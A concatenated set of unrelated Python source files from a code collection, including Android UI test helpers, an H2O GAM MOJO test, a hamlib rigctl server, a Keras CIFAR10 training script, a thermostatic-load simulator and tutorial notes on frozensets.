hongzenghui 2016-8-15\n''' \ndef click_safe_propaganda():\n xpath = \"//android.widget.TextView[@resource-id='com.tianque.linkage:id/module_propaganda']\"\n if MobileUtil.click_element_by_xpath(xpath) is True:\n Log.LogOutput(LogLevel.DEBUG, message=\"点击平安宣传成功\")\n return True\n else:\n Log.LogOutput(LogLevel.ERROR, message=\"点击平安宣传失败\")\n return False\n \n'''\n @功能:点击便民服务\n @para: \n @return: 点击成功,返回True;否则返回False\n @ hongzenghui 2016-8-15\n''' \ndef click_bianmin_service():\n xpath = \"//android.widget.TextView[@resource-id='com.tianque.linkage:id/module_service']\"\n if MobileUtil.click_element_by_xpath(xpath) is True:\n Log.LogOutput(LogLevel.DEBUG, message=\"点击便民服务成功\")\n return True\n else:\n Log.LogOutput(LogLevel.ERROR, message=\"点击便民服务失败\")\n return False\n \n'''\n @功能:点击我的爆料\n @para: \n @return: 点击成功,返回True;否则返回False\n @ hongzenghui 2016-8-15\n''' \ndef click_my_clue():\n xpath = \"//android.widget.TextView[@resource-id='com.tianque.linkage:id/module_my_clue']\"\n if MobileUtil.click_element_by_xpath(xpath) is True:\n Log.LogOutput(LogLevel.DEBUG, message=\"点击我的爆料成功\")\n return True\n else:\n Log.LogOutput(LogLevel.ERROR, message=\"点击我的爆料失败\")\n return False\n \n'''\n @功能:点击首页菜单\n @para: \n @return: 点击成功,返回True;否则返回False\n @ hongzenghui 2016-8-15\n''' \ndef click_firstpage_menu():\n xpath = \"//android.widget.TextView[@resource-id='com.tianque.linkage:id/tab_main']\"\n if MobileUtil.click_element_by_xpath(xpath) is True:\n Log.LogOutput(LogLevel.DEBUG, message=\"点击首页菜单成功\")\n return True\n else:\n Log.LogOutput(LogLevel.ERROR, message=\"点击首页菜单失败\")\n return False\n \n'''\n @功能:点击广场菜单\n @para: \n @return: 点击成功,返回True;否则返回False\n @ hongzenghui 2016-8-15\n''' \ndef click_square_menu():\n xpath = \"//android.widget.TextView[@resource-id='com.tianque.linkage:id/tab_information']\"\n if MobileUtil.click_element_by_xpath(xpath) is True:\n Log.LogOutput(LogLevel.DEBUG, message=\"点击广场菜单成功\")\n return True\n else:\n Log.LogOutput(LogLevel.ERROR, message=\"点击广场菜单失败\")\n return False\n \n'''\n @功能:点击爆料按钮\n @para: \n @return: 点击成功,返回True;否则返回False\n @ hongzenghui 2016-8-15\n''' \ndef click_add_clue_menu():\n xpath = \"//android.widget.ImageView[@resource-id='com.tianque.linkage:id/edit_information']\"\n if MobileUtil.click_element_by_xpath(xpath) is True:\n Log.LogOutput(LogLevel.DEBUG, message=\"点击爆料按钮成功\")\n return True\n else:\n Log.LogOutput(LogLevel.ERROR, message=\"点击爆料按钮失败\")\n return False\n \n'''\n @功能:点击公告菜单\n @para: \n @return: 点击成功,返回True;否则返回False\n @ hongzenghui 2016-8-15\n''' \ndef click_notice_menu():\n xpath = \"//android.widget.TextView[@resource-id='com.tianque.linkage:id/tab_notice']\"\n if MobileUtil.click_element_by_xpath(xpath) is True:\n Log.LogOutput(LogLevel.DEBUG, message=\"点击公告菜单成功\")\n return True\n else:\n Log.LogOutput(LogLevel.ERROR, message=\"点击公告菜单失败\")\n return False\n \n'''\n @功能:点击我的菜单\n @para: \n @return: 点击成功,返回True;否则返回False\n @ hongzenghui 2016-8-15\n''' \ndef click_personal_menu():\n xpath = \"//android.widget.TextView[@resource-id='com.tianque.linkage:id/tab_personal']\"\n if MobileUtil.click_element_by_xpath(xpath) is True:\n Log.LogOutput(LogLevel.DEBUG, message=\"点击我的菜单成功\")\n return True\n else:\n Log.LogOutput(LogLevel.ERROR, message=\"点击我的菜单失败\")\n return False\n \n'''\n @功能:检查是否在主页\n @para: \n @return: 处于主页,返回True;否则返回False\n @ hongzenghui 2016-9-21\n''' \ndef check_in_main_page():\n xpath = \"//android.widget.TextView[@resource-id='com.tianque.linkage:id/module_propaganda']\"\n if MobileUtil.wait_element_by_xpath(xpath,20) is True:\n Log.LogOutput(LogLevel.DEBUG, message=\"当前处于主页\")\n return True\n else:\n Log.LogOutput(LogLevel.ERROR, message=\"当前未处于主页\")\n return False","sub_path":"testAPI/Web_Test/Mobile/UI/Clue/MainPageUI.py","file_name":"MainPageUI.py","file_ext":"py","file_size_in_byte":8577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"577667337","text":"import sys, os\nsys.path.insert(1, \"../../\")\nimport h2o\nfrom tests import pyunit_utils\nfrom random import randint\nimport tempfile\n\n\ndef gam_gaussian_mojo():\n h2o.remove_all()\n NTESTROWS = 200 # number of test dataset rows\n PROBLEM=\"gaussian\"\n params = set_params()\n df = pyunit_utils.random_dataset(PROBLEM, seed=2, missing_fraction=0.5)\n dfnames = df.names\n\n # add GAM specific parameters\n params[\"gam_columns\"] = []\n params[\"scale\"] = []\n count = 0\n num_gam_cols = 3 # maximum number of gam columns\n for cname in dfnames:\n if not(cname == 'response') and (str(df.type(cname)) == \"real\"):\n params[\"gam_columns\"].append(cname)\n params[\"scale\"].append(0.001)\n count = count+1\n if count >= num_gam_cols:\n break\n\n train = df[NTESTROWS:, :]\n test = df[:NTESTROWS, :]\n exclude_list = {\"response\", params[\"gam_columns\"][0]}\n x = list(set(df.names) - exclude_list)\n\n TMPDIR = tempfile.mkdtemp()\n gamGaussianModel = pyunit_utils.build_save_model_generic(params, x, train, \"response\", \"gam\", TMPDIR) # build and save mojo model\n MOJONAME = pyunit_utils.getMojoName(gamGaussianModel._id)\n h2o.download_csv(test, os.path.join(TMPDIR, 'in.csv')) # save test file, h2o predict/mojo use same file\n pred_h2o, pred_mojo = pyunit_utils.mojo_predict(gamGaussianModel, TMPDIR, MOJONAME) # load model and perform predict\n h2o.download_csv(pred_h2o, os.path.join(TMPDIR, \"h2oPred.csv\"))\n print(\"Comparing mojo predict and h2o predict...\")\n pyunit_utils.compare_frames_local(pred_h2o, pred_mojo, 1, tol=1e-10)\n\n\ndef set_params():\n missingValues = ['MeanImputation']\n missing_values = missingValues[randint(0, len(missingValues)-1)]\n\n params = {'missing_values_handling': missing_values, 'family':\"gaussian\"}\n print(params)\n return params\n\n\nif __name__ == \"__main__\":\n pyunit_utils.standalone_test(gam_gaussian_mojo)\nelse:\n gam_gaussian_mojo()\n","sub_path":"h2o-py/tests/testdir_javapredict/pyunit_PUBDEV_7185_GAM_mojo_gaussian.py","file_name":"pyunit_PUBDEV_7185_GAM_mojo_gaussian.py","file_ext":"py","file_size_in_byte":1986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"312991341","text":"import logging\nimport SocketServer\nimport math\nimport time\nfrom rci import client\nimport hamlib_constants\nfrom hamlib_constants import *\n\nclass RigctlHandler(SocketServer.StreamRequestHandler):\n def handle(self):\n while True:\n cmd = self.rfile.readline().strip()\n args = []\n if len(cmd) == 0:\n continue\n send_rprt = True\n # Two forms of command: single character, or \"+\\\" followed by command name.\n # For single-character commands, the command must either generate output or a RPRT line.\n # For +\\ extended commands, the command should always output an RPRT line.\n if len(cmd) > 1 and cmd[0] == \"\\\\\":\n parts = cmd.split(\" \")\n cmd = parts[0][1:]\n if len(parts) > 1:\n args = parts[1:]\n send_rprt = False\n elif len(cmd) > 2 and cmd[0:2] == \"+\\\\\":\n parts = cmd.split(\" \")\n cmd = parts[0][2:]\n if len(parts) > 1:\n args = parts[1:]\n self.wfile.write(\"%s:\\n\" % cmd)\n else:\n # Space after command is optional.\n if len(cmd) > 1:\n args = cmd[1:].lstrip(' ').split(' ')\n cmd = cmd[0]\n send_rprt = False\n logging.info(\"command: %s args: %s\", cmd, args)\n rprt = -1\n if cmd == \"dump_state\":\n self.wfile.write(\"0\\n\") # Protocol version\n self.wfile.write(\"1\\n\") # Rig model\n self.wfile.write(\"2\\n\") # ITU region\n FREQ_RANGE_FMT = \"%(startf)lf %(endf)lf %(modes)lx %(low_power)d %(high_power)d %(vfo)x %(ant)x\\n\"\n # RX Freq ranges\n # startf endf modes low_power high_power vfo ant\n # %lf %lf %llx %d %d %x %x\n self.wfile.write(FREQ_RANGE_FMT % {\n 'startf': 1280e6,\n 'endf': 1300e6,\n 'modes': RIG_MODE_USB,\n 'low_power': -1,\n 'high_power': -1,\n 'vfo': RIG_VFO_A, # VFOA only\n 'ant': RIG_ANT_1, # Antenna 1 only\n })\n self.wfile.write(\"0 0 0 0 0 0 0\\n\") # End of RX freq range list\n # TX Freq ranges\n self.wfile.write(FREQ_RANGE_FMT % {\n 'startf': 1280e6,\n 'endf': 1300e6,\n 'modes': RIG_MODE_USB,\n 'low_power': 1,\n 'high_power': 100000,\n 'vfo': RIG_VFO_A, # VFOA only\n 'ant': RIG_ANT_1, # Antenna 1 only\n })\n self.wfile.write(\"0 0 0 0 0 0 0\\n\") # End of TX freq range list\n # Tuning step size\n self.wfile.write(\"%lx %ld\\n\" % (RIG_MODE_USB, 1)) # USB allows 1 Hz tuning\n self.wfile.write(\"0 0\\n\") # End of tuning step list\n # Filter list\n self.wfile.write(\"0 0\\n\") # End of filter list\n self.wfile.write(\"0\\n\") # max RIT\n self.wfile.write(\"0\\n\") # max XIT\n self.wfile.write(\"0\\n\") # max ifshift\n self.wfile.write(\"0\\n\") # announces\n self.wfile.write(\"10 20 30 40 50 60 70 0 \\n\") # Preamp gains list\n self.wfile.write(\"0 \\n\") # Attenuator losses list\n get_levels = RIG_LEVEL_PREAMP|RIG_LEVEL_AF|RIG_LEVEL_MICGAIN\n if self.server.has_level_strength():\n get_levels |= RIG_LEVEL_STRENGTH\n for value in (\n RIG_FUNC_NONE, # has_get_func\n RIG_FUNC_NONE, # has_set_func\n get_levels, # has_get_level\n RIG_LEVEL_PREAMP|RIG_LEVEL_AF|RIG_LEVEL_MICGAIN, # has_set_level\n RIG_PARM_NONE, # has_get_parm\n RIG_PARM_NONE, # has_set_parm\n ):\n self.wfile.write(\"0x%x\\n\" % value)\n # TODO: Support RIG_LEVEL_RF (float 0-1)\n rprt = 0\n elif cmd in (\"1\", \"dump_caps\"):\n self.wfile.write(\"\"\"Model name: ShinySDR\n Mfg name: ShinySDR\n Rig type: Other\n Can set Frequency: Y\n Can get Frequency: Y\n Can get Mode: Y\n Can get VFO: Y\n Can set PTT: Y\n Can get PTT: Y\n Can set Level: Y\n Can get Level: Y\n \"\"\")\n rprt = 0\n elif cmd in (\"v\", \"get_vfo\"):\n self.wfile.write(\"VFOA\\n\")\n rprt = 0\n elif cmd in (\"s\", \"get_split\"):\n self.wfile.write(\"0\\nVFOA\\n\")\n rprt = 0\n elif cmd in (\"m\", \"get_mode\"):\n self.wfile.write(\"USB\\n15000\\n\")\n rprt = 0\n elif cmd in (\"f\", \"get_freq\"):\n freq = self.server.get_freq()\n logging.info(\"freq = %f\", freq)\n self.wfile.write(\"%d\\n\" % freq)\n rprt = 0\n elif cmd in (\"F\", \"set_freq\"):\n if len(args) != 1:\n rprt = -22\n else:\n freq = float(args[0])\n self.server.set_freq(freq)\n rprt = 0\n send_rprt = True\n elif cmd in (\"t\", \"get_ptt\"):\n # 0 = RX, 1 = TX\n self.wfile.write(\"%d\\n\" % self.server.get_ptt())\n rprt = 0\n elif cmd in (\"T\", \"set_ptt\"):\n if len(args) != 1:\n rprt = -22\n else:\n if int(args[0]) > 0:\n self.server.set_ptt(True)\n else:\n self.server.set_ptt(False)\n rprt = 0\n send_rprt = True\n elif cmd in (\"l\", \"get_level\"):\n if len(args) != 1:\n rprt = -22\n else:\n rprt = -1\n func = getattr(self.server, \"get_level_\"+args[0].lower())\n if func:\n fmt = \"%d\\n\"\n if RIG_LEVEL_IS_FLOAT(getattr(hamlib_constants, \"RIG_LEVEL_\"+args[0].upper(), 0)):\n fmt = \"%f\\n\"\n self.wfile.write(fmt % func())\n rprt = 0\n elif cmd in (\"L\", \"set_level\"):\n if len(args) != 2:\n rprt = -22\n else:\n rprt = -1\n func = getattr(self.server, \"set_level_\"+args[0].lower())\n if func:\n conv = int\n if RIG_LEVEL_IS_FLOAT(getattr(hamlib_constants, \"RIG_LEVEL_\"+args[0].upper(), 0)):\n conv = float\n func(conv(args[1]))\n rprt = 0\n send_rprt = True\n elif cmd == \"q\":\n return\n if rprt != 0 or send_rprt:\n self.wfile.write(\"RPRT %d\\n\" % rprt)\n\nclass RigctlServer(SocketServer.ThreadingTCPServer):\n allow_reuse_address = True\n daemon_threads = True\n\n def set_freq(self, freq):\n self.signal.set_RF_frequency.emit(freq)\n\n def get_freq(self):\n return self.tb.get_RF_frequency()\n\n def set_ptt(self, ptt):\n self.signal.set_ptt_command.emit(ptt)\n\n def get_ptt(self):\n return self.tb.get_ptt_command()\n\n def get_level_preamp(self):\n return self.tb.get_rx_gain()\n\n def set_level_preamp(self, gain):\n self.signal.set_rx_gain.emit(gain)\n\n def get_level_af(self):\n return self.tb.get_volume()\n\n def set_level_af(self, volume):\n self.signal.set_volume.emit(volume)\n\n def get_level_micgain(self):\n return self.tb.get_mic_gain() / 10\n\n def set_level_micgain(self, gain):\n self.signal.set_mic_gain.emit(gain * 10)\n\n def has_level_strength(self):\n return hasattr(self.tb, 'audio_mag_sqrd')\n\n def get_level_strength(self):\n if not self.has_level_strength():\n return 0\n # RIG_LEVEL_STRENGTH is relative to S9 or -79 dBm (S0 = -127 dBm)\n # Our noise floor is at -110 dB/Hz which shows up as -75 dB in audio_mag_sqrd.level()\n # Absent a real calibration, we'll just set -75 dBFS to S0.\n return int(10 * math.log10(self.tb.audio_mag_sqrd.level())) + 27\n \n def __init__(self, tb, signal):\n self.tb = tb\n self.signal = signal\n SocketServer.TCPServer.__init__(self, (\"localhost\", 4532), RigctlHandler)\n client_name = None\n try:\n client_name = open(\"client_name.txt\", \"r\").read().strip()\n except IOError:\n pass\n self.rci = client.Client(client_name=client_name)\n\nif __name__ == \"__main__\":\n # Create the server, binding to localhost on port 4532\n server = RigctlServer(None)\n\n # Activate the server; this will keep running until you\n # interrupt the program with Ctrl-C\n server.serve_forever()\n","sub_path":"dsheen/ssb_transceiver/rigctld.py","file_name":"rigctld.py","file_ext":"py","file_size_in_byte":9167,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"604276816","text":"from datetime import datetime\nfrom joblib import Parallel, delayed\nfrom FO1Dconstants import *\nimport multiprocessing\n\nstartTimeStamp = datetime.now().strftime('%Y%m%d_%H%M%S')\n\nobject_wavelength = 900e-9\n\n\ndef create_simulated_space():\n period = 800\n simulated_space = np.linspace(-period, period, simulatingSpaceTotalStep)\n return simulated_space\n\n\ndef create_object_fucntion():\n simulated_space = create_simulated_space()\n # #####################Step Object#####################\n # K = 1\n # h = np.zeros_like(l)\n # for counter, element in enumerate(simulated_space):\n # if element < 0:\n # h[counter] = 1\n # h = K * h\n # simulated_space *= 1e-9\n # phase_shift = K * h * np.pi\n # amp = 1\n # #####################Step Object#####################\n\n #####################Sin Object#####################\n period = 800\n kval = 30\n K = kval * np.pi\n h = K * np.pi * np.sin(2 * np.pi / period * simulated_space)\n simulated_space *= 1e-9\n phase_shift = h\n amp = 1\n #####################Sin Object#####################\n\n return amp * np.exp(1j * phase_shift)\n\n\ndef main():\n def FO1D(z, zCounter):\n R_o = np.exp(1j * 2 * np.pi * (\n C_3 * lamda ** 3 * (Q ** 4 - QQ ** 4) / 4 + C_5 * lamda ** 5 * (Q ** 6 - QQ ** 6) / 6 - z * lamda * (\n Q ** 2 - QQ ** 2) / 2))\n E_s = np.exp(-np.pi ** 2 * q_ill ** 2 * (\n C_3 * lamda ** 3 * (Q ** 3 - QQ ** 3) + C_5 * lamda ** 5 * (Q ** 5 - QQ ** 5) - z * lamda * (\n Q - QQ)) ** 2 / (4 * np.log(2)))\n\n AR = np.multiply(np.multiply(np.multiply(A, R_o), E_s), E_ct)\n\n for i in range(len(q)):\n for j in range(i + 1, len(q)):\n matrixI[:, zCounter] = matrixI[:, zCounter] + 2 * (\n AR[j][i] * np.exp(1j * 2 * np.pi * (Q[j][i] - QQ[j][i]) * simulated_space)).real\n\n matrixI[:, zCounter] = matrixI[:, zCounter] + np.trace(AR) * np.ones_like(simulated_space)\n\n return matrixI\n\n simulated_space = create_simulated_space()\n wave_obj = create_object_fucntion()\n\n objectFileName = \"FO1DObjectWave_\" + taskName + \"_\" + startTimeStamp + \".npy\"\n\n F_wave_obj = np.fft.fftshift(np.fft.fft(wave_obj, simulatingSpaceTotalStep) * (1 / simulatingSpaceTotalStep))\n\n n_max = np.floor(q_max / (1 / object_wavelength))\n q = 1 / (simulated_space[1] - simulated_space[0]) * np.arange(0, simulatingSpaceTotalStep, 1) / (simulatingSpaceTotalStep)\n q = q - (np.max(q) - np.min(q)) / 2\n\n a = np.sum(np.abs(q) <= q_max)\n\n if len(q) > a:\n q = q[int(np.ceil(simulatingSpaceTotalStep / 2 + 1 - (a - 1) / 2)):int(np.floor(simulatingSpaceTotalStep / 2 + 1 + (a + 1) / 2))]\n F_wave_obj = F_wave_obj[\n int(np.ceil(simulatingSpaceTotalStep / 2 + 1 - (a - 1) / 2)):int(np.floor(simulatingSpaceTotalStep / 2 + 1 + (a + 1) / 2))]\n\n Q, QQ = np.meshgrid(q, q)\n F_wave_obj_q, F_wave_obj_qq = np.meshgrid(F_wave_obj, np.conj(F_wave_obj))\n\n A = np.multiply(F_wave_obj_q, F_wave_obj_qq)\n E_cc = (1 - 1j * np.pi * delta_fcc * lamda * (Q ** 2 - QQ ** 2) / (4 * np.log(2))) ** (-0.5)\n E_ct = E_cc * np.exp(-np.pi ** 2 * (delta_fc * lamda * (Q ** 2 - QQ ** 2) + 1 / 2 * delta_f3c * lamda ** 3 * (\n Q ** 4 - QQ ** 4)) ** 2 * E_cc ** 2 / (16 * np.log(2)))\n\n matrixI = np.zeros((len(simulated_space), len(delta_z_series)), dtype=complex)\n\n print(\"Task:\", taskName)\n print(\"Total Task:\", len(delta_z_series))\n print(\"Total Parallel Steps:\", np.ceil(len(delta_z_series) / (multiprocessing.cpu_count() + numberOfThreads + 1)))\n\n with Parallel(n_jobs=numberOfThreads, verbose=50, max_nbytes=\"50M\") as parallel:\n parallelReult = parallel(delayed(FO1D)(z, zCounter) for zCounter, z in enumerate(delta_z_series))\n\n for mat in parallelReult:\n matrixI += mat\n\n matrixI = np.abs(matrixI)\n\n resultFileName = \"FO1DResult_\" + taskName + \"_\" + startTimeStamp + \".npy\"\n\n print(\"Saving result to:\", resultFileName)\n\n np.save(resultFileName, matrixI)\n print(\"Done\")\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"runFO1DSimulation.py","file_name":"runFO1DSimulation.py","file_ext":"py","file_size_in_byte":4129,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"563853850","text":"# Pablo Abad 2017\n#\n# Toshl database program\n\nimport csv\nimport datetime\n\nclass CSVTransfer:\n def __init__(self, date, effectiveDate, account, message, purpose, amount):\n self.date = date\n self.effectiveDate = effectiveDate\n self.account = account\n self.message = message\n self.purpose = purpose\n self.amount = amount\n\n def __str__(self):\n return \"(%s, %s, %s, %s, %s, %f)\" % (self.date.isoformat(), self.effectiveDate.isoformat(), self.account,\n self.message, self.purpose, self.amount)\n\n def __repr__(self):\n return self.__str__()\n\n @staticmethod\n def fromFileRow(row):\n date = datetime.datetime.strptime(row[0], \"%d.%m.%Y\").date()\n effectiveDate = datetime.datetime.strptime(row[1], \"%d.%m.%Y\").date()\n account = unicode(row[2], 'iso-8859-1')\n purpose = unicode(row[3], 'iso-8859-1')\n message = unicode(row[4], 'iso-8859-1')\n amount = float(row[5].replace(\".\",\"\").replace(\",\",\".\"))\n return CSVTransfer(date, effectiveDate, account, message, purpose, amount)\n\ndef loadCSVTransfersFile(filename):\n with open(filename, 'r') as csvfile:\n reader = csv.reader(csvfile, delimiter=';')\n while reader.next()[0] != \"Buchung\":\n pass\n transfers = map(lambda row : CSVTransfer.fromFileRow(row), reader)\n transfers.sort(key = lambda transfer: transfer.date)\n return transfers\n","sub_path":"legacy/csvfile.py","file_name":"csvfile.py","file_ext":"py","file_size_in_byte":1478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"472700818","text":"# Fronzensets are immutable sets\nfs = frozenset({1, 2, 3}) # hash(fs) -272375401224217160\n\n# argument to frozenset must be any hashable iterable object\nfs = frozenset(range(4)) # frozenset({0, 1, 2, 3})\nfs = frozenset([1, 2, 3]) # frozenset({1, 2, 3})\nfs = frozenset('python') # frozenset({'h', 'n', 'o', 'p', 'y', 't'})\n\n# frozenset(([1, 2], [3, 4])) TypeError: unhashable type\n# frozenset(5) TypeError: 'int' isnt a iterable\n\n# fronzensets are hashable objects.\n# we can use it as dict keys or set elements\ns = {frozenset({1, 2, 3}), frozenset('fa')} # type(s) set\n\n# frozensets only makes shallow copies\nfs1 = frozenset([1, 2]) # fs1 = frozenset({1, 2})\nfs2 = fs1.copy()\t\t\t # fs2 = frozenset({1, 2})\n\n# fs1 is fs2 True, both points to the same object\n# fs1 == fs2 True, both shares the same objects. they're immutable, it is safe.\n\n# non-mutate operations works with frozensets, such as: |, &, - and ^\ns1 = frozenset('abc')\ns2 = {1, 2}\n\n# data type will be defined by the left most element of the operation.\ns3 = s1 | s2 # s3 = frozenset({'b', 'c', 1, 2, 'a'})\ns4 = s2 | s1 # s4 = {'a', 1, 2, 'c', 'b'}\n\n#_____________________________________________________________________________\ndef memoizer(fn):\n\tcache = {}\n\tdef wrapper(*args, **kwargs): # this aproach, order of args would not matter\n\t\tkey = (*args, frozenset(kwargs.items())) # frozenset(args) | frozenset(kwargs.items())\n\t\t# print(cache)\n\t\t# print(key)\n\t\tif key in cache:\n\t\t\treturn cache[key]\n\t\telse:\n\t\t\tresult = fn(*args, **kwargs)\n\t\t\tcache[key] = result\n\t\t\treturn result\n\treturn wrapper\n\n@memoizer\ndef f(*, a, b):\n\treturn a + b\n\nf(a=1, b=2)\n# cache: {} kwargs.items() \n# key: (frozenset({('a', 1), ('b', 2)}),)\n\nf(a=4, b=5) # key v\n# cache: {(frozenset({('a', 1), ('b', 2)}),): 3} \n# key: (frozenset({('b', 5), ('a', 4)}),)\n\n# cache: {(frozenset({('a', 1), ('b', 2)}),): 3, (frozenset({('b', 5), ('a', 4)}),): 9}\n\n# f(a=1, b=2) or f(a=4, b=5) \n# these values is already stored in cache, it just returns and dont calculate it again\n","sub_path":"python/03_hashmaps/08frozensets.py","file_name":"08frozensets.py","file_ext":"py","file_size_in_byte":2113,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"353278756","text":"from __future__ import print_function\nfrom setuptools import setup\nfrom setuptools.command.test import test as TestCommand\nimport io\nimport os\nimport sys\nimport datetime\n\nimport tankerkoenig_api\n\nhere = os.path.abspath(os.path.dirname(__file__))\n__version = datetime.datetime.now().strftime(\"%Y.%m.%d.%H%M%S\")\nif \"CI_COMMIT_TAG\" in os.environ:\n __version = os.environ[\"CI_COMMIT_TAG\"]\n\n\ndef read(*filenames, **kwargs):\n encoding = kwargs.get('encoding', 'utf-8')\n sep = kwargs.get('sep', '\\n')\n buf = []\n for filename in filenames:\n with io.open(filename, encoding=encoding) as f:\n buf.append(f.read())\n return sep.join(buf)\n\n\nlong_description = read('README.md')\n\n\nclass Tox(TestCommand):\n def finalize_options(self):\n TestCommand.finalize_options(self)\n self.test_args = []\n self.test_suite = True\n def run_tests(self):\n #import here, cause outside the eggs aren't loaded\n import tox\n errcode = tox.cmdline(self.test_args)\n sys.exit(errcode)\n\nsetup(\n name='tankerkoenig_api',\n version=__version,\n url='https://gitlab.com/smartesthome.blog/libraries/python/tankerkoenig_api',\n license='Apache Software License',\n author='Iulius Gutberlet',\n tests_require=['tox==3.3.0', 'flake8==3.5.0', 'flake8_docstrings==1.3.0'],\n install_requires=['requests==2.19.1'],\n cmdclass={'test': Tox},\n author_email='iulius@sniggle.me',\n description='tankerkoenig API',\n long_description=long_description,\n packages=['tankerkoenig_api'],\n include_package_data=True,\n platforms='any',\n test_suite='tankerkoenig_api.test.test_tankerkoenig',\n classifiers = [\n 'Programming Language :: Python',\n 'Development Status :: 4 - Beta',\n 'Natural Language :: English',\n 'Environment :: Web Environment',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: Apache Software License',\n 'Operating System :: OS Independent',\n 'Topic :: Software Development :: Libraries'\n ],\n extras_require={\n 'testing': ['pytest'],\n }\n)\n","sub_path":"pypi_install_script/tankerkoenig_api-0.1.1.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"286114847","text":"'''\nWe define a simple TCL simulator here, which is similar to one-node\nmode of a water heater.\n'''\n\nimport numpy as np\nfrom .controller import thermostat_controller\n\n# we define the TCL simulator (fridge in this example)\ndef TCLsimulator(duration, # [h]\n T_0=40., # [F] initial temp\n delta_t=1./3600, # [h] time step\n C=263., # [BTU /F]\n R=.1, # [h F/BTU]\n T_amb=65., # [F]\n m_t=0, #\n P_r=2000*3.4121, # [BTU/h]\n sigma=0,\n T_s=40., # [F] set point\n deadband=2., # [F]\n enable_control=False,\n F_t=None,\n f_low=59.9,\n f_high=60.1):\n \n count = int(duration / delta_t)\n \n T_sim = np.zeros(count)\n Ms = np.zeros(count)\n P_t = np.zeros(count)\n \n T_sim[0] = T_0\n\n alpha = np.exp(-delta_t/(C*R))\n\n T_gain = R*P_r\n\n T_t = T_0\n m_t = 0\n \n for i in range(count-1):\n # the fridge has a different mechanics of ON/OFF , we need to reverse\n if enable_control and F_t is not None:\n m_t = thermostat_controller(m_t, T_t, T_s, deadband,\n enable_control,\n F_t[i],f_low,f_high,\n True)\n else:\n m_t = thermostat_controller(m_t, T_t, T_s, deadband,\n reverse_ON_OFF=True)\n # track the status change \n Ms[i] = m_t\n P_t[i] = m_t * P_r / 3.4121\n epsilon_t = sigma * np.random.randn(1)\n T_t = alpha * T_t + (1-alpha)*(T_amb - m_t * T_gain) + epsilon_t\n T_sim[i+1] = T_t\n\n return T_sim, P_t, (Ms,alpha,T_gain)\n","sub_path":"gridBallast/TCLSimulator.py","file_name":"TCLSimulator.py","file_ext":"py","file_size_in_byte":1922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"92427941","text":"import os\nimport keras\nfrom keras.datasets import cifar10\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Conv2D, Dropout, MaxPool2D, Flatten\n\nBATCHSIZE = 32\nNUMCLASSES = 10\nEPOCHS = 100\nNUM_PREDICTIONS = 20\nSAVEDIR = os.path.join(os.getcwd(), 'saved_models')\nMODELNAME = 'keras_cifar10_trained_model.h5'\n\n# Split the data between train and test set\n(trainX, trainY), (testX, testY) = cifar10.load_data()\nprint(\"trainX shape: {}\".format(trainX.shape))\nprint(\"trainY shape: {}\".format(trainY.shape))\nprint(\"testX shape: {}\".format(testX.shape))\nprint(\"testY shape: {}\".format(testY.shape))\n\n# Convert labels to one hot encode\ntrainY = keras.utils.to_categorical(trainY, NUMCLASSES)\ntestY = keras.utils.to_categorical(testY, NUMCLASSES)\n\n# Model structure\nmodel = Sequential()\n\nmodel.add(Conv2D(filters=32, kernel_size=(3, 3), input_shape=trainX.shape[1:],\n padding='same', activation='relu'))\nmodel.add(Conv2D(filters=32, kernel_size=(3, 3), activation='relu'))\nmodel.add(MaxPool2D(pool_size=(2, 2)))\nmodel.add(Dropout(0.25))\n\nmodel.add(Conv2D(filters=64, kernel_size=(3, 3), input_shape=trainX.shape[1:],\n padding='same', activation='relu'))\nmodel.add(Conv2D(filters=64, kernel_size=(3, 3), activation='relu'))\nmodel.add(MaxPool2D(pool_size=(2, 2)))\nmodel.add(Dropout(0.25))\n\nmodel.add(Flatten())\nmodel.add(Dense(units=512, activation='relu'))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(units=NUMCLASSES, activation='softmax'))\n\n# initiate RMSpropOptimizer\noptimizer = keras.optimizers.RMSprop(learning_rate=0.0001, decay=1e-6)\n\n# Compile the model\nmodel.compile(loss='categorical_crossentropy', optimizer=optimizer, metrics=['accuracy'])\n\n# Normalise data\ntrainX = trainX.astype('float32')\ntestX = testX.astype('float32')\ntrainX = trainX / 255\ntestX = testX / 255\n\nmodel.fit(trainX, trainY, batch_size=BATCHSIZE, epochs=EPOCHS,\n validation_data=(testX, testY), shuffle=True)\n\n# Save model and weights\nif not os.path.isdir(SAVEDIR):\n os.makedirs(SAVEDIR)\nMODELPATH = os.path.join(SAVEDIR, MODELNAME)\nmodel.save(MODELPATH)\n\nscores = model.evaluate(testX, testY, verbose=1)\nprint('Test loss:', scores[0])\nprint('Test accuracy:', scores[1])\n\n\n\n","sub_path":"cifar10.py","file_name":"cifar10.py","file_ext":"py","file_size_in_byte":2202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"353338331","text":"from nucleus.common.extensions import db\nfrom nucleus.core.model import BaseModel\n\n\nclass Categories(BaseModel):\n __table_args__ = (db.UniqueConstraint(\"name\", \"content_type\"),)\n __filterable__ = [\"content_type\"]\n __files__ = [\"icon_id\"]\n __dictable__ = [\"id\", \"name\", \"content_type\", \"icon\"]\n __relations__ = [\"icon\"]\n\n name = db.Column(db.String, comment=\"Name\")\n content_type = db.Column(db.String, nullable=False, comment=\"Content type\")\n icon_id = db.Column(db.String, db.ForeignKey(\"files.id\"), comment=\"Icon picture\")\n\n icon = db.relationship(\"Files\", backref=\"icon_category\", 